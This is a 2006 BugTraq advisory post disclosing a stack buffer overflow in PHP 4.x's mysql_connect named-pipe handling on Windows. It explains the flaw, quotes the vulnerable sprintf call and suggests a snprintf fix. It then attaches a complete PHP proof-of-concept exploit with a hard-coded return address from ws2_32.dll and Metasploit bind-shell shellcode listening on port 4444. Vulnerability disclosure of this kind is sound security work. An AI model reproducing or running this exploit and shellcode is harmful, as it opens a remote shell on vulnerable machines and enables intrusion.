BugTraq
Windows PHP 4.x "0-day" buffer overflow Jan 05 2006 03:52AM
mercenary hushmail com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Buffer Overflow in PHP MySQL functions

I. RISK

Low - Remote code execution on some systems
The function is not normaly exposed to external users via input data

II. AFFECTED VERSIONS

4.x Branch under Windows

III. BACKGROUND

PHP contains many built-in functions to allow a developer to
interface with MySQL servers. One of these, mysql_connect()
contains functionality to allow a user to connect via named pipes
to a server.

IV. DESCRIPTION

The format of the mysql_connect function is as follows:

mysql_connect(host, username);

The host field can accept a host in the following format when PHP
is used on a Windows system:

"hostname:/pipe"

Where "pipe" is the named pipe to use. Within the internal code,
this pipe name is later copied into a 257 byte internal character
buffer. By supplying a long pipe variable, we are able to preform a
classical stack based buffer overflow attack. From
\ext\mysql\libmysql\libmysql.c line 216:

HANDLE create_named_pipe(NET *net, uint connect_timeout, char
**arg_host,
char **arg_unix_socket)
{
[...]
char szPipeName [ 257 ];
[...]
sprintf( szPipeName, "\\\\%s\\pipe\\%s", host, unix_socket);

The variable unix_socket is the value of the host string after the
trailing colon (:), if it exists.

Because we will be overflowing several pointers, the address of a
valid memory location must also be written to memory 4 bytes after
our replacement EIP. When our EIP is restored, ESI will contain a
pointer to the value of the "username" variable. This can be used
as a location to store our shellcode, as it is a reliable location.

V. EXPLOIT

This exploit was designed to work with PHP versions 4.3.10 and
4.4.0 under Windows XP SP 1. If another operating system is used,
the replacement EIP must be changed.

The replacement EIP is written 261 bytes into our string. For this
exploit, I used a CALL ESI from ws2_32.dll from Windows XP SP1.

The replacement ESI is simply the base of the PHP image. Locations
after this address will be overwritten with some internal data.

Our shellcode is written into the $user variable. $two is used to
prevent $user from being truncated with a MySQL error message.

VI. WORKAROUND

None.

VII. FIX

The length of unix_socket should be verified prior to use. In
addition, the string should be formatted using a safe function such
as snprintf, followed by a hardcoded null terminator.

VIII. POC

POC is attached.

-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4

wkYEARECAAYFAkO8lv4ACgkQLpU3lrW2nNMlTACfeYj28WH+qaJRr+UJ41wVUkfSHd8A
niKUfNuCT9LgoX8fjWb7oi2W5QTj
=QoFC
-----END PGP SIGNATURE-----

<?php

//Exploit for

// Apache/1.3.33

// PHP/4.4.0

//Windows only

$eip = "71AB5651"; //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0

$esi = "10000000"; //ESI - Temporary. The memory under this location will be trashed.

//Metasploit win32 bind shell on port 4444

//Thread exit method, no filter

$shellcode = pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f188b5f2001e
b498b348b01ee31c099ac84c07407c1ca0d01c2ebf43b54242875e58b5f2401eb668b0c4
b8b5f1c01eb032c8b896c241c61c331db648b43308b400c8b701cad8b40085e688e4e0ee
c50ffd6665366683332687773325f54ffd068cbedfc3b50ffd65f89e56681ed0802556a0
2ffd068d909f5ad57ffd6535353535343534353ffd06668115c665389e19568a41a70c75
7ffd66a105155ffd068a4ad2ee957ffd65355ffd068e549864957ffd650545455ffd0936
8e779c67957ffd655ffd0666a646668636d89e56a505929cc89e76a4489e231c0f3aafe4
22dfe422c938d7a38ababab6872feb316ff7544ffd65b57525151516a0151515551ffd06
8add905ce53ffd66affff37ffd08b57fc83c464ffd652ffd068efcee06053ffd6ffd0");

//Endian conversion

$eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2);

$esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2);

$overflowstring = "localhost:/";

$overflowstring .= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";

$overflowstring .= pack("H*",$eip); //EIP

$overflowstring .= pack("H*",$esi); //ESI

$overflowstring .= "/";

//If we don't define this, our shellcode gets truncated

$two = "AAAAAAAAAA";

mysql_connect($overflowstring, $shellcode);

?>-----BEGIN PGP SIGNATURE-----

Charset: UTF8

Version: Hush 2.4

wkYEABECAAYFAkO8lswACgkQLpU3lrW2nNMTcwCfV/RtT6TMT2JliS3uXd5osu7g/HgA

oIxVWUU8qxj4nxR0XRRUZtBUnQYa

=6EoD

-----END PGP SIGNATURE-----

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus